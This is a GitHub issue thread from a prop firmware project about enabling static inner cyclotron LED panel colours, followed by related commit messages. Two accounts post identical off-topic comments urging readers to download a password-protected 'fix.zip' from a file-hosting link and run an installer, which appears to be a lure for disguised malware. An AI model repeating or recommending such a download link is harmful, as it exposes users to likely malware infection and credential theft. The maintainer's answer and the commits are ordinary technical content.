gpstar81/GPStar-proton-pack #370: Static Panel Light Colors

Aces6469, 2024-08-26:
### What do you need assistance with?

The EEPROM info doesn't seem to have been updated to tell us how to change to the prop accurate frutto panel LED colors. Am I missing it or is it not there? if I could be told how to enable said setting as well it'd be appreciated.

### Firmware Version

5.3.3

### Homework Completed

- [X] I did my part!

nomakewan, 2024-08-26:
If you mean the documentation, you are correct, the documentation didn't update. But it's the same as just turning the panel on, except instead of the only options being "Enabled/Disabled" it's now "Disabled/Static Colours/Dynamic Colours".

So EEPROM LED Menu Level 2, Option 2, Intensify. Or set it using the web interface with a wireless module/Attenuator.

Aces6469, 2024-08-26:
gotcha, thanks man. Thought I was going crazy for a sec lol.

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nomakewan, 2024-08-26:
Documentation for the inner cyclotron LED panel has been updated for the next release.

commit 69fe48b0 (2024-08-26): Update inner cyclotron LED panel

This updates the inner cyclotron LED panel so that the mode indicators for vibration and year remain off if the brass pack effect is running and updates the documentation and web UI to make it clearer how the three available modes for the inner cyclotron LED panel work which resolves #370
commit 97e0c2a3 (2024-10-08): V5.4.0 (#381)

* Code cleanup

This cleans up a lot of unused variables from the codebase, corrects the documentation on the inner cyclotron LED ring, and fixes a bug where the wand would not play the correct voice clip when changing between static and dynamic inner cyclotron LED panel modes.

* Implement Halloween holiday mode

When wand is in Holiday firing mode, user can now press the barrel wing button to switch between Halloween and Christmas modes, which are fully supported on the wand, pack, and attenuator. Resolves #368

* Fix barrel tip fade effect

This fixes the speed of the barrel  [... cut]